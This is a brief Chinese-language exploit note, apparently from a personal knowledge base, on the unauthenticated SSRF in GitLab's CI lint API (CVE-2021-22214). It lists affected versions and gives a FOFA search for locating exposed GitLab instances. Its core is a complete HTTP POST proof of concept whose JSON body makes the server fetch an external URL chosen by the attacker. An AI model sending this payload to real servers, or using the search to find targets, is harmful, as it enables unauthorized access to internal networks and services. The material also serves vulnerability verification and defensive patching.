# GitLab API未授权SSRF漏洞(CVE-2021-22214)

# 一、漏洞简介
GitLab存在前台未授权SSRF漏洞，未授权的攻击者也可以利用该漏洞执行SSRF攻击（CVE-2021-22214）。漏洞源于对用户提供数据的验证不足，远程攻击者可通过发送特殊构造的 HTTP 请求，欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求

# 二、影响版本
13.10.5 > GitLab >= 10.5

13.11.5 > GitLab >= 13.11

13.12.2 > GitLab >= 13.12

# 三、资产测绘
+ fofa`app="GitLab"`
+ 特征

![1721111619268-5863c992-b306-41aa-bc6b-79164c134ed3.png](./img/YHP79yE5zWVjScmt/1721111619268-5863c992-b306-41aa-bc6b-79164c134ed3-435493.png)

# 四、漏洞复现
```http
POST /api/v4/ci/lint HTTP/1.1
Host: 
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 113


{"include_merged_yaml": true, "content": "include:\n  remote: http://ynuujrnegu.dgrh3.cn/api/v1/targets?test.yml"}
```

![1721111645089-c6026c90-8d00-4177-b710-4a3d1abcea1a.png](./img/YHP79yE5zWVjScmt/1721111645089-c6026c90-8d00-4177-b710-4a3d1abcea1a-842840.png)



> 更新: 2024-09-05 23:24:41  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/thghq5r9qu36rl0l>